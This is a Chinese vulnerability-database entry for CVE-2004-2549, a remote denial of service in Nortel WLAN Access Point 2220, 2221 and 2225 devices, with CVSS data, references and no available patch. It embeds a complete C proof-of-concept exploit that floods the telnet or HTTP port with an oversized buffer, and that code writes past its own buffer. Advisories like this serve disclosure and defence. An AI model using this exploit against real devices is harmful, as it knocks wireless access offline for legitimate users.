CVE-2004-2549
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:27
NMCOE    

[原文]Nortel Wireless LAN (WLAN) Access Point (AP) 2220, 2221, and 2225 allow remote attackers to cause a denial of service (service crash) via a TCP request with a large string, followed by 8 newline characters, to (1) the Telnet service on TCP port 23 and (2) the HTTP service on TCP port 80, possibly due to a buffer overflow.


[CNNVD]Nortel Wireless LAN Access Point 2200系列远程拒绝服务攻击漏洞(CNNVD-200412-190)

        
        Nortel Wireless LAN Access Point 2200系列是无线接入设备。
        Nortel Wireless LAN Access Point 2200系列在处理超大网络请求时处理不正确,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。
        LAN AP 2200允许客户端服务器之间的任意通信,LAN使用默认23和80口进行管理。攻击者提交超大网络请求给无线LAN访问接入设备的默认管理服务进行处理,可导致无线接入服务崩溃,停止对其他正常用户的响应。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:nortel:wlan_access_point_2221Nortel WLAN Access Point 2221
cpe:/h:nortel:wlan_access_point_2225Nortel WLAN Access Point 2225
cpe:/h:nortel:wlan_access_point_2220Nortel WLAN Access Point 2220

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2549
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2549
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-190
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/15373
(UNKNOWN)  XF  nortel-accesspoint-telnet-dos(15373)
http://www116.nortelnetworks.com/docs/bvdoc/wlan/216109a.pdf
(UNKNOWN)  MISC  http://www116.nortelnetworks.com/docs/bvdoc/wlan/216109a.pdf
http://www.securityfocus.com/bid/9787
(UNKNOWN)  BID  9787
http://www.osvdb.org/4128
(UNKNOWN)  OSVDB  4128
http://securitytracker.com/id?1009294
(UNKNOWN)  SECTRACK  1009294
http://secunia.com/advisories/11034
(VENDOR_ADVISORY)  SECUNIA  11034
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/0055.html
(UNKNOWN)  FULLDISC  20040301 Nortel Networks Wireless LAN Access Point 2200 DoS + PoC

- 漏洞信息

Nortel Wireless LAN Access Point 2200系列远程拒绝服务攻击漏洞
中危 边界条件错误
2004-12-31 00:00:00 2006-01-24 00:00:00
远程  
        
        Nortel Wireless LAN Access Point 2200系列是无线接入设备。
        Nortel Wireless LAN Access Point 2200系列在处理超大网络请求时处理不正确,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。
        LAN AP 2200允许客户端服务器之间的任意通信,LAN使用默认23和80口进行管理。攻击者提交超大网络请求给无线LAN访问接入设备的默认管理服务进行处理,可导致无线接入服务崩溃,停止对其他正常用户的响应。
        

- 公告与补丁

        厂商补丁:
        Nortel Networks
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.nortelnetworks.com/index.html

- 漏洞信息 (23786)

Nortel Wireless LAN Access Point 2200 Series Denial Of Service Vulnerability (EDBID:23786)
hardware dos
2004-03-02 Verified
0 Alex Hernandez
N/A [点击下载]
source: http://www.securityfocus.com/bid/9787/info

Nortel Wireless LAN Access Point 2200 series appliances have been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when a large network request is handled by one of the Wireless LAN Access Point default administration services. This will reportedly cause the Access Point Appliance Operating service to crash, effectively denying service to legitimate users.

/* WLAN-DoS.c
 *
 * Nortel Networks Wireless LAN Access Point 2200 DoS + PoC
 * discovered by Alex Hernandez.
 *
 * Copyright (C) 2004  Alex Hernandez.
 *
 * A successful attack on a vulnerable server can cause the AP
 * (Access Point) listener to fail and crash. The port 23 (telnet)
 * functionality cannot be restored until the listener is manually restarted.
 *
 * LAN AP 2200 permits client-server communication across any network.
 * LAN enables by default the port 23 (telnet) and port (80) for administering.
 * Debugging features are enabled by default, if LAN AP encounters such a request,
 * it will crash and no longer field AP requests from authorized clients.
 *
 * Simple lame code by
 *
 * -Mark Ludwik :Germany
 *
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>

int main(int argc, char *argv[]) {
 if(argc < 3) {
  printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");
  printf("Usage: WlanDoS [AP/Host] [port]\n\n");
  exit(-1);
 }

 int sock;
 char explbuf[2024];
 struct sockaddr_in dest;
 struct hostent *he;

 if((he = gethostbyname(argv[1])) == NULL) {
  printf("Couldn't resolve %s!\n", argv[1]);
  exit(-1);
 }

 if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  perror("socket()");
  exit(-1);
 }

 printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");

 dest.sin_addr = *((struct in_addr *)he->h_addr);
 dest.sin_port = htons(atoi(argv[2]));
 dest.sin_family = AF_INET;

 printf("[+] Exploit buffer.\n");
 memset(explbuf, 'A', 2024);
 memcpy(explbuf+2024, "\n\n\n\n\n\n\n\n", 8);

 if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
  perror("connect()");
  exit(-1);
 }

 printf("[+] Connected...\n");
 printf("[+] Sending DoS attack...!\n");

 send(sock, explbuf, strlen(explbuf), 0);
 sleep(2);
 close(sock);
 printf("\n[+] Crash was successful !\n");
 return(0);
}
		

- 漏洞信息

4128
Nortel WLAN Access Point 2200 DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

WLAN Access Point 2200 contains a flaw that may allow a remote denial of service. The issue is triggered when specially crafted packets are sent to administrative ports, and will result in loss of availability for the platform.

- 时间线

2004-03-01 2004-03-01
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站